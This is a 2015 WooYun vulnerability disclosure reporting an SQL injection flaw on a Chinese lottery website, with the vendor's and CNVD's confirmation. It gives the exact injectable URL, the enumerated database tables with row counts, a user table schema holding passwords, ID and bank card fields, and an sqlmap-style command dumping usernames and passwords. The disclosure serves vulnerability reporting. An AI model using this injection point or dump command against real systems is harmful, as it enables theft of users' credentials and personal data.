当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131165

漏洞标题:卓彩网某处SQL注入泄露会员信息(百万级)

相关厂商:北京中民卓彩科技发展有限公司

漏洞作者: huoge

提交时间:2015-08-04 21:29

修复时间:2015-09-21 11:14

公开时间:2015-09-21 11:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

注入

详细说明:

卓彩网 - 在线购买彩票,福彩体彩足彩开奖查询
卓彩网(www.joycp.net)以服务中国彩票行业为己任,致力于为我国数亿彩票用户群体提供丰富多彩、种类全面、安全可靠的电话及手机购彩服务。
注入点:

http://www.joycp.com/Interface/CMS/GetCmsNanGe.ashx?lNa
me=2021&rowNuma=0&rowNumb=3


数据量不小:

Database: LOTTERYDB
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| TSP_LOG | 25261730 |
| B2B_LOG | 10266975 |
| USER_ACCOUNTDETAIL | 5365455 |
| TICKET_TSP_SEQUENCE | 2911384 |
| TICKET_ORDERTICKET | 2873540 |
| TICKET_ORDERTICKETEXTEND | 2779005 |
| USER_VISIT_LOG | 2436777 |
| TICKET_TOGETHERABORTION | 2358759 |
| DEPOSIT_LOG | 1963851 |
| TICKET_ORDER | 1185729 |
| TICKET_ORDEREXTEND | 1185724 |
| USER_ACCOUNT | 1154543 |
| USER_INFOEXTEND | 1111853 |
| USER_INFO | 1111847 |
| AWARD_INFO | 1111244 |
| JOYCP_CARD | 1052010 |
| DEPOSIT_DETAIL | 1032650 |
| HERO_ERRORLOG | 626514 |
| USER_EXPERIENCEDETAIL | 447701 |
| SCORE_VERSUS | 310778 |
| MONITOR_LOG | 121707 |
| TICKET_ACCOUNTDETAIL | 98284 |
| HERO_SQLLOG | 97979 |
| B2B_ACCOUNTDETAIL | 78126 |
| TOGETHER_USER | 77043 |
| USER_NOTICE | 70033 |
| USER_EVENTINFO | 65007 |
| AWARDISSUE_FOOTBALL | 58118 |
| B2B_ORDERTICKET | 37822 |
| B2B_ORDERTICKETEXTEND | 37822 |
| MONITOR_SMS | 28505 |
| USER_AWARDINFO | 28102 |
| SCORE_MATCH | 23777 |
| TOGETHER_PROJECT | 22177 |
| FOOTBALL_TEAM | 16028 |
| USER_DRAWMONEY | 13965 |
| CMS_ARTICLETYPE | 11889 |
| CMS_ARTICLE | 11597 |
| TOGETHER_GAMESOCRE | 7774 |
| TICKET_ACCOUNTDSHARE | 6915 |
| HERO_TICKETORDERID | 4747 |
| TOGETHER_SCOREANALYZE | 3560 |
| PARTNERS_ACCOUNTDETAIL | 2590 |
| USER_FOLLOWER | 2585 |
| TICKETORDERPACKAGE | 2494 |
| USER_NOTICECONFIG | 1970 |
| PARTNERS_INFO | 1523 |
| USER_PACKAGE | 1188 |
| AWARD_SALE_ADDRESS | 1160 |
| USER_OPERATE_LOG | 960 |
| HERO_MANUAL_WINDATA | 445 |
| ADMIN_MENUPERMISSION | 346 |
| DICT_GAMETYPE | 337 |
| DICT_TSP_CMDCODE | 235 |
| HERO_TEMP_TICKETTSPID | 171 |
| JOYCP_ACTIVITY | 109 |
| DICT_TSP_CMDCODE_DATABAK | 102 |
| CMS_CATEGORY | 75 |
| USER_TOGETHEFOLLOWCONFIG | 75 |
| ADMIN_MENU | 70 |
| USER_TOGETHEFOLLOWDETAIL | 70 |
| USER_BROADBANDFOLLOW | 60 |
| DICT_DEPOSIT_SUBCHANEL | 59 |
| ADMIN_PERMISSION | 55 |
| TSP_GAMECONFIG | 51 |
| USER_TOGETHEFOLLOWCOUNT | 51 |
| GUARANTEEPROFIT | 45 |
| FOOTBALL_LEAGUE | 44 |
| DICT_USER_ACOUNTTYPE | 38 |
| DICT_GAMENAME | 32 |
| AWARD_FOREIGNDATA_CONFIG | 28 |
| HERO_TICKET_ORDERTICKETBAK | 27 |
| HERO_TICKET_ORDERTICKETEXTENDK | 27 |
| AWARD_ISSUENOW | 26 |
| CMS_AUTHOR | 26 |
| DICT_DEPOSIT_CHANEL | 26 |
| CMS_SOURCE | 21 |
| HERO_DINGTOU | 21 |
| TSP_INFO | 21 |
| PACKAGE_CONFIG | 20 |
| TSP_ACCOUNTDETAIL | 20 |
| HERO_JOYCPCARDAGENT | 19 |
| ADMIN_USERINFO | 17 |
| DICT_SCORESTATUS | 10 |
| ADMIN_ROLE | 9 |
| B2B_GAMECONFIG | 9 |
| DICT_USEREXPERIENCE | 8 |
| DICT_USERNOTICETYPE | 8 |
| AWARD_FOREIGNDATA_GAMECONFIG | 7 |
| B2B_INFO | 6 |
| DICT_B2B_ACCOUNTTYPE | 6 |
| DICT_ORDERMODE | 6 |
| DICT_TICKET_STATUS | 6 |
| DICT_ORDERTYPE | 5 |
| DICT_SMSTYPE | 4 |
| PACKAGETYPE | 4 |
| DICT_ORDERORIGIN | 3 |
| DICT_ORDERSTATUS | 3 |
| DICT_PARTNERS_ACCOUNTTYPE | 3 |
| USER_BROADCASTDATAANNALS | 3 |
| DICT_MSGTYPE | 2 |
| CMS_KEYWORDVALUE | 1 |
| DICT_TSP_ACCOUNTTYPE | 1 |
| DICT_USER_OPERATE_TYPE | 1 |
| USER_BROADCASTDATA | 1 |
+--------------------------------+---------+


USER_INFO表结构;
USER_INFO 1111847 //数据量

Database: LOTTERYDB
Table: USER_INFO
[21 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| "\x08ARTNERID" |
| BANKADDRESS | VARCHAR2 |
| BANKCARD | VARCHAR2 |
| BANKNAME | VARCHAR2 |
| CHECK |
| CHECKEMAIL | NUMBER |
| CONSUMMATE | NUMBER |
| CREATETIME | DATE |
| DRAWPWD | VARCHAR2 |
| EMAIL | VARCHAR2 |
| IDCARD | VARCHAR2 |
| IDCARD_STATUS | NUMBER |
| IDCARDTYPE | NUMBER |
| MOBILE | VARCHAR2 |
| PWD | VARCHAR2 |
| REALNAME | VARCHAR2 |
| SECURITYANSWER | VARCHAR2 |
| SECURITYQUESTION | VARCHAR2 |
| STATUS | NUMBER |
| USERID | NUMBER |
| USERNAME | VARCHAR2 |
+------------------+----------+


随便选了两列跑了几行数据:
-D LOTTERYDB -T USER_INFO -C "USERNAME,PWD" --start 1111800 --stop 1111847 --dump

QQ截图20150802221959.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 huoge@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-07 11:12

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无


漏洞评价:

评论